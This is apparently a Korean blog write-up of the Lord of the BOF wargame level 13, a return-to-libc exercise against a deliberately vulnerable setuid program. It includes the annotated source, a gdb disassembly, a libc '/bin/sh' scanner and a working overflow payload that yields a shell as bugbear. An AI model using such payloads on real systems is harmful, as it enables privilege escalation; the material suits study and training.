


[시스템해킹][LOB] Level 13 : Darkknight -> Bugbear

sh4n3e 2017. 7. 13. 19:25

해당 문제는 BOF의 Basic RTL을 먼저 보면 좀 더 쉽게 이해할 수 있다.

아래는 진행 과정을 순서대로 나열했다.


[darkknight@localhost darkknight]$ cat bugbear.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - bugbear

        - RTL1

*/


#include <stdio.h>

#include <stdlib.h>


/* Challenge binary: copies argv[1] into a 40-byte stack buffer with an
 * unbounded strcpy(), guarded only by a one-byte check on argv[1][47].
 * NOTE(review): main has no return type (implicit int) and strcpy() is
 * called without <string.h>; the old toolchain this was built with
 * accepted both, current C compilers reject them. */
main(int argc, char *argv[])

{

char buffer[40];   /* destination of the unbounded copy below */

int i;             /* never used */


if(argc < 2){

printf("argv error\n");

exit(0);

}


/* Reads byte 47 of the argument without checking its length, so an
 * argument shorter than 48 bytes makes this an out-of-bounds read.
 * With buffer at %ebp-40 (see the disassembly), bytes 40-43 overlay the
 * saved %ebp and bytes 44-47 the saved return address; byte 47 is its
 * most significant byte. Rejecting 0xbf only blocks return addresses
 * into the stack region -- the real fix is to bound the copy to
 * sizeof buffer rather than pattern-match one byte of the payload. */
if(argv[1][47] == '\xbf')

{

printf("stack betrayed you!!\n");

exit(0);

}


/* Unbounded copy: any argument of 40 bytes or more (plus NUL) overruns
 * buffer and the saved frame below it. A bounded form such as
 * snprintf(buffer, sizeof buffer, "%s", argv[1]) would close the hole. */
strcpy(buffer, argv[1]); 

printf("%s\n", buffer);

}


(gdb) set disassembly-flavor intel

(gdb) disass main

Dump of assembler code for function main:

0x8048430 <main>: push   %ebp

0x8048431 <main+1>: mov    %ebp,%esp

0x8048433 <main+3>: sub    %esp,44

0x8048436 <main+6>: cmp    DWORD PTR [%ebp+8],1

0x804843a <main+10>: jg     0x8048453 <main+35>

0x804843c <main+12>: push   0x8048500

0x8048441 <main+17>: call   0x8048350 <printf>

0x8048446 <main+22>: add    %esp,4

0x8048449 <main+25>: push   0

0x804844b <main+27>: call   0x8048360 <exit>

0x8048450 <main+32>: add    %esp,4

0x8048453 <main+35>: mov    %eax,DWORD PTR [%ebp+12]

0x8048456 <main+38>: add    %eax,4

0x8048459 <main+41>: mov    %edx,DWORD PTR [%eax]

0x804845b <main+43>: add    %edx,47

0x804845e <main+46>: cmp    BYTE PTR [%edx],0xbf

0x8048461 <main+49>: jne    0x8048480 <main+80>

0x8048463 <main+51>: push   0x804850c

0x8048468 <main+56>: call   0x8048350 <printf>

0x804846d <main+61>: add    %esp,4

0x8048470 <main+64>: push   0

0x8048472 <main+66>: call   0x8048360 <exit>

0x8048477 <main+71>: add    %esp,4

0x804847a <main+74>: lea    %esi,[%esi]

0x8048480 <main+80>: mov    %eax,DWORD PTR [%ebp+12]

0x8048483 <main+83>: add    %eax,4

0x8048486 <main+86>: mov    %edx,DWORD PTR [%eax]

0x8048488 <main+88>: push   %edx

0x8048489 <main+89>: lea    %eax,[%ebp-40]

0x804848c <main+92>: push   %eax

0x804848d <main+93>: call   0x8048370 <strcpy>

0x8048492 <main+98>: add    %esp,8

0x8048495 <main+101>: lea    %eax,[%ebp-40]

0x8048498 <main+104>: push   %eax

0x8048499 <main+105>: push   0x8048522

0x804849e <main+110>: call   0x8048350 <printf>

0x80484a3 <main+115>: add    %esp,8

0x80484a6 <main+118>: leave  

0x80484a7 <main+119>: ret    

0x80484a8 <main+120>: nop    

0x80484a9 <main+121>: nop     


Breakpoint 1, 0x8048436 in main ()

(gdb) print system 

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>


[darkknight@localhost darkknight]$ vi getsh.c          


#include <stdio.h>

#include <string.h>


/* Write-up helper: scans forward from the libc address gdb printed for
 * system() (0x40058ae0, see `print system` above) and prints the first
 * address at which the bytes equal the string "/bin/sh".
 * NOTE(review): as listed this does not build cleanly -- the closing
 * brace of main() is missing, exit() needs <stdlib.h>, and assigning an
 * integer constant to `char *ptr` needs a cast. The output shown on the
 * page (0x400fbff9) indicates it was nevertheless run on the original host. */
int main(){

        char *ptr = 0x40058ae0;   /* scan start: address of system() reported by gdb */


        for(;;){

                /* strcmp() compares from ptr until a mismatch or NUL, so each
                 * iteration is one full comparison at a single byte offset.
                 * The loop has no upper bound: it relies on a match being
                 * found before ptr leaves mapped memory. */
                if(strcmp("/bin/sh", ptr)==0){

                        printf("0x%x\n", ptr);   /* %x with a pointer argument; %p is the correct specifier */

                        exit(0);

                }

                ptr++;

        }

[darkknight@localhost darkknight]$ ./getsh

0x400fbff9


$(python -c 'print "A"*44+"\xe0\x8a\x05\x40"+"BBBB"+"\xf9\xbf\x0f\x40"') 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��@BBBB��@

bash$ whoami

bugbear

bash$ id 

uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)

bash$ /bin/my-pass

euid = 513

new divide

bash$ 



